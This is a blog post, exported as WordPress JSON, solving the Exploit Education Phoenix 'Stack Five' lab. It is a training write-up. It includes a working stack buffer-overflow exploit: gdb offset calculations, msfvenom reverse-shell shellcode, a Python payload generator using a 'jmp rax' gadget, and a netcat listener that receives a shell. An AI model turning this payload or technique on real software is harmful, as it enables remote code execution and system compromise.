{"id":442,"date":"2019-07-09T11:34:29","date_gmt":"2019-07-09T15:34:29","guid":{"rendered":"https:\/\/blog.lamarranet.com\/?p=442"},"modified":"2019-08-16T13:19:01","modified_gmt":"2019-08-16T17:19:01","slug":"exploit-education-phoenix-stack-five-solution","status":"publish","type":"post","link":"https:\/\/blog.lamarranet.com\/index.php\/exploit-education-phoenix-stack-five-solution\/","title":{"rendered":"Exploit Education | Phoenix | Stack Five Solution"},"content":{"rendered":"

Stack Five<\/h1>\n

The description and source code can be found here:
\nhttps:\/\/exploit.education\/phoenix\/stack-five\/<\/a><\/p>\n

Now things are getting a bit tricky. This time we’ll need to utilize the ability to control the Instruction Pointer register (in this case, RIP) to jump to some shell code we inject onto the stack. The source code is pretty simple. The main()<\/span> function calls the start_level()<\/span> function, which gets input from the user and saves it to the “buffer<\/strong>” variable:<\/p>\n

void start_level() {\r\n    char buffer[128];\r\n    gets(buffer);\r\n}\r\n\r\nint main(int argc, char **argv) {\r\n    printf("%s\\n", BANNER);\r\n    start_level();\r\n}<\/pre>\n
First, I need to see how far away from the start of the “buffer<\/strong>” variable the return address is in that frame:<\/p>\n
$ gdb -q stack-five \r\nGEF for linux ready, type `gef' to start, `gef config' to configure\r\n71 commands loaded for GDB 8.2.1 using Python engine 3.5\r\n[*] 2 commands could not be loaded, run `gef missing` to know why.\r\nReading symbols from stack-five...(no debugging symbols found)...done.\r\ngef> disas start_level\r\nDump of assembler code for function start_level:\r\n   0x000000000040058d <+0>:     push   rbp\r\n   0x000000000040058e <+1>:     mov    rbp,rsp\r\n   0x0000000000400591 <+4>:     add    rsp,0xffffffffffffff80\r\n   0x0000000000400595 <+8>:     lea    rax,[rbp-0x80]\r\n   0x0000000000400599 <+12>:    mov    rdi,rax\r\n   0x000000000040059c <+15>:    call   0x4003f0 <gets@plt>\r\n   0x00000000004005a1 <+20>:    nop\r\n   0x00000000004005a2 <+21>:    leave  \r\n   0x00000000004005a3 <+22>:    ret    \r\nEnd of assembler dump.\r\n\r\ngef> b *0x00000000004005a1\r\nBreakpoint 1 at 0x4005a1\r\n\r\ngef> run <<< $(python -c 'print "A" + "B"*126 + "C"')\r\nStarting program: \/opt\/phoenix\/amd64\/stack-five <<< $(python -c 'print "A" + "B"*126 + "C"') Welcome to phoenix\/stack-five, brought to you by https:\/\/exploit.education Breakpoint 1, 0x00000000004005a1 in start_level () [... GEF output snipped ...] gef> info frame\r\nStack level 0, frame at 0x7fffffffe650:\r\n rip = 0x4005a1 in start_level; saved rip = 0x4005c7\r\n called by frame at 0x7fffffff0010\r\n Arglist at 0x7fffffffe640, args: \r\n Locals at 0x7fffffffe640, Previous frame's sp is 0x7fffffffe650\r\n Saved registers:\r\n  rbp at 0x7fffffffe640, rip at 0x7fffffffe648\r\n\r\ngef> info registers $rsp\r\nrsp            0x7fffffffe5c0      0x7fffffffe5c0\r\n\r\ngef> printf "%i\\n", 0x7fffffffe648 - 0x7fffffffe5c0\r\n136<\/pre>\n
So we have 136 bytes before hitting the return address. Now I can generate some shell code and put it on the stack within the “buffer<\/strong>” variable. At first, I tried using some code I found here: http:\/\/shell-storm.org\/shellcode\/<\/a>. And these would work if I compiled the C code and executed it directly. For example, this one (http:\/\/shell-storm.org\/shellcode\/files\/shellcode-603.php<\/a>):<\/p>\n
int main(void)\r\n{\r\n    char shellcode[] =\r\n    "\\x48\\x31\\xd2"                                  \/\/ xor    %rdx, %rdx\r\n    "\\x48\\xbb\\x2f\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68"      \/\/ mov      $0x68732f6e69622f2f, %rbx\r\n    "\\x48\\xc1\\xeb\\x08"                              \/\/ shr    $0x8, %rbx\r\n    "\\x53"                                          \/\/ push   %rbx\r\n    "\\x48\\x89\\xe7"                                  \/\/ mov    %rsp, %rdi\r\n    "\\x50"                                          \/\/ push   %rax\r\n    "\\x57"                                          \/\/ push   %rdi\r\n    "\\x48\\x89\\xe6"                                  \/\/ mov    %rsp, %rsi\r\n    "\\xb0\\x3b"                                      \/\/ mov    $0x3b, %al\r\n    "\\x0f\\x05";                                     \/\/ syscall\r\n\r\n    (*(void (*)()) shellcode)();\r\n\r\n    return 0;\r\n}<\/pre>\n
When I compile & run it, it gives me a shell:<\/p>\n
user@phoenix-amd64:~$ gcc -fno-stack-protector -z execstack shell.c -o shell\r\nuser@phoenix-amd64:~$ .\/shell \r\n$ id\r\nuid=1000(user) gid=1000(user) groups=1000(user),27(sudo)<\/pre>\n
However, putting that same shell code on the stack and executing it from within the stack-five program wouldn’t work. So I wanted to test using a reverse shell instead. I fired up a Kali VM and used msfvenom<\/span> to generate the shell code:<\/p>\n
root ~ # msfvenom -p linux\/x64\/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 --platform linux -a x64 -f python --var-name shellcode\r\nNo encoder or badchars specified, outputting raw payload\r\nPayload size: 74 bytes\r\nFinal size of python file: 424 bytes\r\nshellcode =  ""\r\nshellcode += "\\x6a\\x29\\x58\\x99\\x6a\\x02\\x5f\\x6a\\x01\\x5e\\x0f\\x05"\r\nshellcode += "\\x48\\x97\\x48\\xb9\\x02\\x00\\x11\\x5c\\x7f\\x00\\x00\\x01"\r\nshellcode += "\\x51\\x48\\x89\\xe6\\x6a\\x10\\x5a\\x6a\\x2a\\x58\\x0f\\x05"\r\nshellcode += "\\x6a\\x03\\x5e\\x48\\xff\\xce\\x6a\\x21\\x58\\x0f\\x05\\x75"\r\nshellcode += "\\xf6\\x6a\\x3b\\x58\\x99\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f"\r\nshellcode += "\\x73\\x68\\x00\\x53\\x48\\x89\\xe7\\x52\\x57\\x48\\x89\\xe6"\r\nshellcode += "\\x0f\\x05"<\/pre>\n
I’m going to use a python script to create a file used for overflowing the buffer. This also makes it easier to make modifications:<\/p>\n
#!\/usr\/bin\/env python\r\n\r\n# Total bytes until return address: 136\r\ntotal = 136\r\n\r\nshellcode =  ""\r\nshellcode += "\\x6a\\x29\\x58\\x99\\x6a\\x02\\x5f\\x6a\\x01\\x5e\\x0f\\x05"\r\nshellcode += "\\x48\\x97\\x48\\xb9\\x02\\x00\\x11\\x5c\\x7f\\x00\\x00\\x01"\r\nshellcode += "\\x51\\x48\\x89\\xe6\\x6a\\x10\\x5a\\x6a\\x2a\\x58\\x0f\\x05"\r\nshellcode += "\\x6a\\x03\\x5e\\x48\\xff\\xce\\x6a\\x21\\x58\\x0f\\x05\\x75"\r\nshellcode += "\\xf6\\x6a\\x3b\\x58\\x99\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f"\r\nshellcode += "\\x73\\x68\\x00\\x53\\x48\\x89\\xe7\\x52\\x57\\x48\\x89\\xe6"\r\nshellcode += "\\x0f\\x05"\r\n\r\n#The start of shellcode: 0x00007fffffffe5c0\r\nret = "\\xc0\\xe5\\xff\\xff\\xff\\x7f\\x00\\x00"\r\n\r\npayload = ""\r\npayload += shellcode\r\npayload += "A" * (total - len(payload))\r\npayload += ret\r\n\r\nwith open("payload", "wb") as f:\r\n    f.write(payload)<\/pre>\n
To test this, I’ll need two terminals SSH’d into the VM. One to start a netcat listener:<\/p>\n
$ nc -nlvp 4444\r\nListening on [0.0.0.0] (family 0, port 4444)<\/pre>\n
Then I’ll execute the script & use the resulting file as input for the stack-five program:<\/p>\n
$ cat ~\/payload | .\/stack-five \r\nWelcome to phoenix\/stack-five, brought to you by https:\/\/exploit.education\r\nSegmentation fault<\/pre>\n
Well that didn’t work. However, having recently obtained my OSCP certification, their mantra is still fresh in my head, “Try harder.” Instead of putting an address on the stack directly into the RIP register, I’d like to find another instruction that can jump the execution there, like jmp esp<\/span>. I can use the ROPgadget<\/span> tool for this:<\/p>\n
$ ROPgadget --binary stack-five --only "jmp"\r\nGadgets information\r\n============================================================\r\n0x0000000000400481 : jmp rax\r\n\r\nUnique gadgets found: 1<\/pre>\n
It looks like the only option is a jmp eax<\/span> instruction. Let’s take a look at where the RAX register is pointing to when execution returns from the start_level()<\/span> function. I’ll set a breakpoint in the main()<\/span> function right after the call to start_level()<\/span>. After running the program and passing a bit of input, we can see that RAX points to the start of the “buffer” variable in start_level()<\/span>, which was the same as the RSP register during that frame:<\/p>\n
$ gdb -q stack-five \r\nGEF for linux ready, type `gef' to start, `gef config' to configure\r\n71 commands loaded for GDB 8.2.1 using Python engine 3.5\r\n[*] 2 commands could not be loaded, run `gef missing` to know why.\r\nReading symbols from stack-five...(no debugging symbols found)...done.\r\ngef> disas main\r\nDump of assembler code for function main:\r\n   0x00000000004005a4 <+0>:     push   rbp\r\n   0x00000000004005a5 <+1>:     mov    rbp,rsp\r\n   0x00000000004005a8 <+4>:     sub    rsp,0x10\r\n   0x00000000004005ac <+8>:     mov    DWORD PTR [rbp-0x4],edi\r\n   0x00000000004005af <+11>:    mov    QWORD PTR [rbp-0x10],rsi\r\n   0x00000000004005b3 <+15>:    mov    edi,0x400620\r\n   0x00000000004005b8 <+20>:    call   0x400400 <puts@plt>\r\n   0x00000000004005bd <+25>:    mov    eax,0x0\r\n   0x00000000004005c2 <+30>:    call   0x40058d <start_level>\r\n   0x00000000004005c7 <+35>:    mov    eax,0x0\r\n   0x00000000004005cc <+40>:    leave  \r\n   0x00000000004005cd <+41>:    ret    \r\nEnd of assembler dump.\r\n\r\ngef> b *0x00000000004005c7\r\nBreakpoint 1 at 0x4005c7\r\n\r\ngef> run\r\nStarting program: \/opt\/phoenix\/amd64\/stack-five \r\nWelcome to phoenix\/stack-five, brought to you by https:\/\/exploit.education\r\nAAAA\r\n\r\nBreakpoint 1, 0x00000000004005c7 in main ()\r\n\r\n[... GEF output snipped ...]\r\n\r\ngef> i r $rax\r\nrax            0x7fffffffe5c0      0x7fffffffe5c0<\/pre>\n
This means that we can make use of that jmp rax<\/span> instruction. I’ll modify the generate_payload.py<\/span> script to overwrite the return address with 0x0000000000400481. I don’t need to include all of the leading zeros since that’s what’s already on the stack:<\/p>\n
#!\/usr\/bin\/env python\r\n\r\n# Total bytes until return address: 136\r\ntotal = 136\r\n\r\nshellcode =  ""\r\nshellcode += "\\x6a\\x29\\x58\\x99\\x6a\\x02\\x5f\\x6a\\x01\\x5e\\x0f\\x05"\r\nshellcode += "\\x48\\x97\\x48\\xb9\\x02\\x00\\x11\\x5c\\x7f\\x00\\x00\\x01"\r\nshellcode += "\\x51\\x48\\x89\\xe6\\x6a\\x10\\x5a\\x6a\\x2a\\x58\\x0f\\x05"\r\nshellcode += "\\x6a\\x03\\x5e\\x48\\xff\\xce\\x6a\\x21\\x58\\x0f\\x05\\x75"\r\nshellcode += "\\xf6\\x6a\\x3b\\x58\\x99\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f"\r\nshellcode += "\\x73\\x68\\x00\\x53\\x48\\x89\\xe7\\x52\\x57\\x48\\x89\\xe6"\r\nshellcode += "\\x0f\\x05"\r\n\r\n# This return address goes to 'jmp eax'\r\nret = "\\x81\\x04\\x40"\r\n\r\npayload = ""\r\npayload += shellcode\r\npayload += "A" * (total - len(payload))\r\npayload += ret\r\n\r\nwith open("payload", "wb") as f:\r\n    f.write(payload)<\/pre>\n
Let’s test this again. In one terminal, I’ll create the payload and start the netcat listener:<\/p>\n
$ .\/generate_payload.py \r\n$ nc -nlvp 4444\r\nListening on [0.0.0.0] (family 0, port 4444)<\/pre>\n
In another terminal, I’ll execute the program:<\/p>\n
$ cat ~\/payload | \/opt\/phoenix\/amd64\/stack-five \r\nWelcome to phoenix\/stack-five, brought to you by https:\/\/exploit.education<\/pre>\n
Checking the other terminal, I’ve got a shell!<\/p>\n
$ nc -nlvp 4444\r\nListening on [0.0.0.0] (family 0, port 4444)\r\nConnection from 127.0.0.1 56878 received!\r\nid\r\nuid=1000(user) gid=1000(user) euid=405(phoenix-amd64-stack-five) egid=405(phoenix-amd64-stack-five) groups=405(phoenix-amd64-stack-five),27(sudo),1000(user)<\/pre>\n","protected":false},"excerpt":{"rendered":"
As opposed to executing an existing function in the binary, this time we\u2019ll be introducing the concept of \u201cshell code\u201d, and being able to execute our own code … Continue readingExploit Education | Phoenix | Stack Five Solution<\/span><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-442","post","type-post","status-publish","format-standard","hentry","category-solutions"],"_links":{"self":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/442","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/comments?post=442"}],"version-history":[{"count":2,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/442\/revisions"}],"predecessor-version":[{"id":684,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/442\/revisions\/684"}],"wp:attachment":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/media?parent=442"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/categories?post=442"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/tags?post=442"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}